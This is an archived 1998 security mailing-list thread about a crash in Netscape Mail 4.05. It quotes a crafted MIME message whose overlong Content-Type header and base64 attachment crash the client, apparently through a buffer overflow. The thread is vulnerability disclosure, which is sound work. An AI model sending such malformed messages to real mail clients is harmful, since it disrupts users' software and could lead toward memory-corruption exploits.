It makes perfect sense that any header field could overflow a limited buffer. I'd assumed that developers would have the sense to check ALL of the buffers used to store headers, but maybe this should be pointed out to them, just to make sure. We may see exploits based on bugs in UUDECODE and BinHex decoders in mailers as well. I'm sure they're there given the overall low quality of the code that these companies are generating (sigh). --Brett Glass At 08:21 PM 7/28/98 +0200, Paul Boehm wrote: >Hi, >netscape mail crashes when trying to the attachment >from the following pseudo mime mail: > >From: Paul Boehm <paulat_private> >To: paulat_private >Subject: test >Mime-Version: 1.0 >Content-Type: AAAAAAAAAAAAAAAAAAAAAA...; boundary=ABC123 >--ABC123 >Content-Type: text/plain; charset=us-ascii > >test123 > >--ABC123 >Content-Type: application/octet-stream >Content-Transfer-Encoding: base64 >Content-Disposition: attachment; filename="AA" > >H4sIAA7jvDUAA+3OOQ6EQBBD0Y45hY9QJejiPI1EBhJiuT+LiEeaAEj+SxzYgdfR09PcLMyU >JLURdzZX3hopcm49vD6Ks/acZI8/O2zLWmYpTWUbfu/6+Y0/L+uGUn39AQAAAAAAAAAAAAAA >AADwvx2CTC7aACgAAA== > >--ABC-- > >i suppose this is exploitable, but i don't really know. >i only tested this with win95 netscape 4.05. > >bye, > paul > >-- > >[ Paul S. Boehm | paulat_private | http://paul.boehm.org/ | infected@irc ] > >Money is what gives a programmer his resources. It's an exchange system created >by human beings. It surrounds us. Works for us, binds the economy together. >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:09:38 PDT